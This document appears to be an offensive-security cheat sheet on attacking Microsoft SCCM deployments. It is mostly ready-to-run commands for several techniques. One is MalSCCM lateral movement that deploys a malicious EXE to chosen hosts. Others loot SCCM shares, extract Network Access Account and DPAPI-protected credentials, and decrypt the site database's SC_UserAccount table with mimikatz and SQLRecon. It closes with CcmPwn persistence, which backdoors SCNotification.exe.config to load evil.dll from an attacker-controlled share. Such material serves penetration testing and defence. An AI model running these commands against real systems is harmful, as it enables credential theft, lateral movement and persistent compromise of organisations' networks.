Skip to content

Deployment - SCCM

SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation.

SCCM Application Deployment

  • PowerShellMafia/PowerSCCM - PowerShell module to interact with SCCM deployments
  • nettitude/MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage

  • Using SharpSCCM

    .\SharpSCCM.exe get devices --server <SERVER8NAME> --site-code <SITE_CODE>
    .\SharpSCCM.exe <server> <sitecode> exec -d <device_name> -r <relay_server_ip>
    .\SharpSCCM.exe exec -d WS01 -p "C:\Windows\System32\ping" -s --debug

  • Compromise client, use locate to find management server
    MalSCCM.exe locate
  • Enumerate over WMI as an administrator of the Distribution Point
    MalSCCM.exe inspect /server:<DistributionPoint Server FQDN> /groups
  • Compromise management server, use locate to find primary server
  • Use inspect on primary server to view who you can target
    MalSCCM.exe inspect /all
    MalSCCM.exe inspect /computers
    MalSCCM.exe inspect /primaryusers
    MalSCCM.exe inspect /groups
  • Create a new device group for the machines you want to laterally move too

    MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
    MalSCCM.exe inspect /groups

  • Add your targets into the new group

    MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL

  • Create an application pointing to a malicious EXE on a world readable share : SCCMContentLib$

    MalSCCM.exe app /create /name:demoapp /uncpath:"\\BLORE-SCCM\SCCMContentLib$\localthread.exe"
    MalSCCM.exe inspect /applications

  • Deploy the application to the target group

    MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment
    MalSCCM.exe inspect /deployments

  • Force the target group to checkin for updates

    MalSCCM.exe checkin /groupname:TargetGroup

  • Cleanup the application, deployment and group

    MalSCCM.exe app /cleanup /name:demoapp
    MalSCCM.exe group /delete /groupname:TargetGroup

SCCM Shares

Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares

  • 1njected/CMLoot
    Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt
    Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml
    Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi

SCCM Configuration Manager

CRED-1 Retrieve credentials via PXE boot media


  • On the SCCM Distribution Point: HKLM\Software\Microsoft\SMS\DP\PxeInstalled = 1
  • On the SCCM Distribution Point: HKLM\Software\Microsoft\SMS\DP\IsPxe = 1
  • PXE-enabled distribution point


CRED-2 Request a policy containing credentials


  • PKI certificates are not required for client authentication
  • Domain accounts credential


Create a machine or compromise an existing one, then request policies such as NAAConfig

SharpSCCM get secrets -u <username-machine-$> -p <password>
SharpSCCM get naa

CRED-3 Extract currently deployed credentials stored as DPAPI blobs

Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.


  • Local administrator privileges on an SCCM client


  • Find SCCM blob

    Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
    NetworkAccessPassword : <![CDATA[E600000001...8C6B5]]>
    NetworkAccessUsername : <![CDATA[E600000001...00F92]]>

  • Using GhostPack/SharpDPAPI

    $str = "060...F2DAF"
    $bytes = for($i=0; $i -lt $str.Length; $i++) {[byte]::Parse($str.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber); $i++}
    $b64 = [Convert]::ToBase64String($bytes[4..$bytes.Length])
    .\SharpDPAPI.exe blob /target:$b64 /mkfile:masterkeys.txt    

  • Using Mayyhem/SharpSCCM for SCCM retrieval and decryption

    .\SharpSCCM.exe local secrets -m wmi

From a remote machine.

  • Using garrettfoster13/sccmhunter
    python3 ./ http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip -auto

CRED-4 Extract legacy credentials stored as DPAPI blobs


  • Local administrator privileges on an SCCM client


  • Search the database using SharpDPAPI

    .\SharpDPAPI.exe search /type:file /path:C:\Windows\System32\wbem\Repository\OBJECTS.DATA

  • Search the database using SharpSCCM

    .\SharpSCCM.exe local secrets -m disk

  • Check ACL for the CIM repository located at C:\Windows\System32\wbem\Repository\OBJECTS.DATA:

    Get-Acl C:\Windows\System32\wbem\Repository\OBJECTS.DATA | Format-List -Property PSPath,sddl
    ConvertFrom-SddlString ""

CRED-5 Extract the SC_UserAccount table from the site database


  • Site database access
  • Primary site server access
    • Access to the private key used for encryption


  • gentilkiwi/mimikatz
    mimikatz # misc::sccm /connectionstring:"DRIVER={SQL Server};Trusted=true;DATABASE=ConfigMgr_CHQ;SERVER=CM1;"
  • skahwah/SQLRecon, only if the site server and database are hosted on the same system
    SQLRecon.exe /auth:WinToken /host:CM1 /database:ConfigMgr_CHQ /module:sDecryptCredentials
  • SQLRecon + xpn/sccmdecryptpoc.cs
    SQLRecon.exe /auth:WinToken /host:<SITE-DB> /database:CM_<SITECODE> /module:query /command:"SELECT * FROM SC_UserAccount"
    sccmdecryptpoc.exe 0C010000080[...]5D6F0

SCCM Persistence

  • mandiant/CcmPwn - lateral movement script that leverages the CcmExec service to remotely hijack user sessions.

CcmExec is a service native to SCCM Windows clients that is executed on every interactive session. This technique requires Adminsitrator privileges on the targeted machine.

  • Backdoor the SCNotification.exe.config to load your DLL

    python3 domain/user:password@workstation.domain.local exec -dll evil.dll -config exploit.config
  • Malicious config to force SCNotification.exe to load a file from an attacker-controlled file share

    python3 domain/user:password@workstation.domain.local coerce -computer